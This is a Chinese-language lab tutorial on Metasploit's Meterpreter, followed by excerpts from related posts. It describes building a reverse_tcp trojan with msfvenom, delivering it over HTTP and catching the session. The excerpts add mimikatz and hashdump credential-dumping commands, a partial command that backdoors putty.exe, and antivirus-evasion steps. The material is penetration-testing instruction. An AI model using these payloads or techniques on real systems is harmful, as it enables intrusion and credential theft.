Meterpreter核心命令

2022-06-15 13:06:10 字數 1856 閱讀 6614

掌握meterpreter常見的基本命令的使用

1、meterpreter介紹

meterpreter是metasploit框架中的乙個擴充套件模組,作為溢位成功以後的攻擊載荷使用,攻擊載荷在溢位攻擊成功以後給我們返回乙個控制通道。使用它作為攻擊載荷能夠獲得目標系統的乙個meterpretershell的鏈結。

另外meterpreter能夠躲避入侵檢測系統。在遠端主機上隱藏自己,它不改變系統硬碟中的檔案,因此hids[基於主機的入侵檢測系統]很難對它做出響應。此外它在執行的時候系統時間是變化的,所以跟蹤它或者終止它對於乙個有經驗的人也會變得非常困難。

最後,meterpreter還可以簡化任務建立多個會話。可以來利用這些會話進行滲透。

2、meterpreter優點

3、meterpreter工作過程

掌握meterpreter常見的基本命令的使用

滲透機klilinux賬號密碼:root/toor 靶機windowsxp賬號密碼:xp/123456

滲透機klilinux賬號密碼:root/toor 靶機windows賬號密碼:123456

1、在kalilinux下開啟乙個終端檢視kali的ip位址

2、使用msfvenom生成乙個windows系統下的payload

3、將msf.exe拷貝乙份並命名為msf.exe.bak,然後使用python來開啟乙個http服務。這個主要是為了借用web來吧msf.exe.bak傳輸到靶機上去。一般在滲透測試中這一步需要你利用一些上傳漏洞或者其他等將生成的木馬傳輸到目標機器上。

5、此時需要先開啟metasploit中的監聽模組,輸入命令msfconsole,先載入模組exploits/multi/handler,並設定payload跟生成木馬的payload一致,均為:windows/meterpreter/reverse_tcp,設定監聽位址(即kali虛擬機器位址),監聽埠也設定為4444,然後輸入exploit執行監聽。

6、接著在靶機系統上雙擊msf.exe來執行木馬程式後,此時在滲透機的metasploit介面會顯示有新的session生成,即表示已經獲取到了靶機的meterpreter shell。

7、在當前的meterpreter介面上輸入?即可檢視幫助命令

8、輸入命令background即可將當前的meterpreter shell放到後台,再次輸入session -i sesssionid即可進入指定的meterpreter shell介面

9、meterpreter中也整合了多個指令碼,可以使用命令run來執行meterpreter的一些指令碼,此處以指令碼checkvm來舉例,此指令碼主要是用來檢視目標機是否是虛擬機器

10、如果想讓指令碼在後台執行,也可以使用命令bgrun

11、如果想在meterpreter下使用windows api程式設計,可以使用命令irb

12、示例:彈出乙個helloworld

13、此時在靶機系統上彈出來乙個helloworld的對話方塊

14、如果要完全退出當前的session,輸入命令quit或者exit即可退出當前session,此時這個meterpreter並不是隱藏到後台了,而是完全退出了。

15、以上即可meterpreter的一些常用的基本命令,還有 比較重要的兩個命令migratepivot由於要與其他的一些命令配合使用,我們在後面的一些相關模組會講到。

後滲透之meterpreter常用命令

sessions sessions h 檢視幫助 sessions i load mimikatz 載入mimikatz模組 kerberos 獲取明文密碼 tspkg 獲取明文密碼 wdigest 獲取密碼 跟kerberos相同 hashdump 獲取雜湊值 mimikatz command f...

6 1 meterpreter建立後門

1 使用msfvenom putty.exe程式,生成後門程式bd putty.exe。該程式與宿主程式具體相同的功能,當執行後門程式的同時,將執行攻擊載荷。msfvenom a x64 platform windows x opt putty.exe k p windows x64 meterpr...

利用meterpreter下的Venom免殺後門

1 tar.gz or zip or git clone 2.賦予檔案可執行許可權 cd venom main sudo chmod r x sh sudo chmod r x py 3.安裝依賴關係包 cd aux sudo setup.sh 4.執行 sudo venom.sh 目標機 win7...